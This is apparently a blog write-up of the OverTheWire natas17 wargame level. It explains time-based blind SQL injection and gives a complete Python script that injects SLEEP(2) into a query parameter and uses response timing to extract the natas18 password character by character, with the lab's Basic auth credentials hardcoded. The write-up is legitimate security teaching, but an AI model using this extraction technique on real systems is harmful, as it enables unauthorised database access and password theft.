Looking through the code, it looks like the request parameters are being directly passed into the SQL query again, but this time the output that's displayed back to us is commented out.
This causes a problem because it no longer matters what the query returns -- in all cases, there is no response.
We can, however, use a side-channel like the time it takes for the SQL query to execute. This is the first example of a "blind" SQL injection so far.
I wrote a quick python script that automates a process of constructing the query so that if a guess of a substring of the password is correct, the query will sleep for 2 seconds. The script then tracks how long each web request takes to return and uses the timing information to decide whether the guessed password substring was correct.
Here's the code:
import urllib2
from datetime import datetime
auth_head = 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=='
alphanumerics = map(chr, range(65, 91) + range(97,123) + range(48, 58))
def make_url(char, start):
return "http://natas17.natas.labs.overthewire.org/?username=natas18%22%20AND%20ASCII(SUBSTR(password,"+str(start)+",1))=ASCII(%22"+str(char)+"%22)%20AND%20SLEEP(2)%20AND%20%22a%22=%22a&debug=true"
def is_correct(char, start):
#print make_url(char, start), "-->",
req = urllib2.Request(make_url(char, start))
req.add_header("Authorization", auth_head)
t1 = datetime.now()
response = urllib2.urlopen(req).read()
t2 = datetime.now()
#print (t2 - t1).seconds
return (t2 - t1).seconds > 1
password = ""
while len(password) < 32:
print "Password =", password
for char in alphanumerics:
if is_correct(char, len(password)+1):
#print "correct! -->", char
password = password + char
break
print password
print "Woohoo!"
The output takes a few minutes to process, but the result is the password for natas18!
No comments:
Post a Comment